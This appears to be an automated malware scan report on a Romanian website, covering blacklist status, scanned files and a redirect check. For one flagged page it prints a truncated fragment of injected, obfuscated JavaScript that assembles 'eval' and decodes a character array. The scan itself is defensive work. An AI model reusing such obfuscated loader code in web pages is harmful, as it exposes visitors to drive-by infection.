Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mobilis.com.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mobilis.com.ro/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mobilis.com.ro/ | 200 OK Content-Length: 16660 Content-Type: text/html | clean |
http://www.mobilis.com.ro/jquery.js | 200 OK Content-Length: 91675 Content-Type: application/x-javascript | clean |
http://www.mobilis.com.ro/script.js | 200 OK Content-Length: 6970 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://www.mobilis.com.ro/prev/lib/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 1400 Content-Type: application/x-javascript | clean |
http://www.mobilis.com.ro/prev/source/jquery.fancybox.js | 200 OK Content-Length: 4 Content-Type: application/x-javascript | clean |
http://www.mobilis.com.ro/prev/source/helpers/jquery.fancybox-buttons.js?v=2.0.4 | 200 OK Content-Length: 2978 Content-Type: application/x-javascript | clean |
http://www.mobilis.com.ro/prev/source/helpers/jquery.fancybox-thumbs.js?v=2.0.4 | 200 OK Content-Length: 3805 Content-Type: application/x-javascript | clean |
http://www.mobilis.com.ro/swfobject.js | 200 OK Content-Length: 10242 Content-Type: application/x-javascript | clean |
http://www.mobilis.com.ro/despre-noi.html | 200 OK Content-Length: 18895 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 Antivirus reports:
| ||
http://www.mobilis.com.ro/produse.html | 200 OK Content-Length: 8352 Content-Type: text/html | clean |
http://www.mobilis.com.ro/terminale_radio_conventionale.html | 404 Not Found Content-Length: 315 Content-Type: text/html | clean |
http://www.mobilis.com.ro/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://www.mobilis.com.ro/terminale_radio_conventionale_portabile.html | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
http://www.mobilis.com.ro/terminale_radio_conventionale_mobile.html | 404 Not Found Content-Length: 322 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mobilis.com.ro
Result:
GET / HTTP/1.1
Host: mobilis.com.ro
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mobilis.com.ro
Referer: http://www.google.com/search?q=mobilis.com.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mobilis.com.ro
Referer: http://www.google.com/search?q=mobilis.com.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.